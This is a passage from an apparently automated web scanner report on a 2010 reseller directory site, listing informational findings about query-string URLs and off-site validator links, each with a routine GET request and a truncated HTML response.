The response contains the following links to other domains:

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.289. http://www.resellerbase.com/resources-information/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.290. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.291. http://www.resellerbase.com/resources-information/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.292. http://www.resellerbase.com/resources-information/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.293. http://www.resellerbase.com/review.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /review.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /review.php?id=24 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Suspended Resource</
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.294. http://www.resellerbase.com/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: searc
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.295. http://www.resellerbase.com/sendmail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /sendmail.php?lid=11 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.296. http://www.resellerbase.com/tag/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /tag/googlepr.php?link_id=6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:52:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.297. http://www.resellerbase.com/tag/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /tag/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: searc
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.298. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.299. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.300. http://www.resellerbase.com/tag/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.301. http://www.resellerbase.com/tag/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.302. http://www.resellerbase.com/tag/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tag/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.303. http://www.resellerbase.com/tags.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tags.php?&ltr=%23 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:26:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tag Clouds [#]</titl
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.304. http://www.resellerbase.com/tell_friend.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tell_friend.php?id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.305. http://www.resellerbase.com/travel-vaccation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.306. http://www.resellerbase.com/travel-vaccation/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel-vaccation/googlepr.php?link_id=20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.307. http://www.resellerbase.com/travel-vaccation/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:42:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 20530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
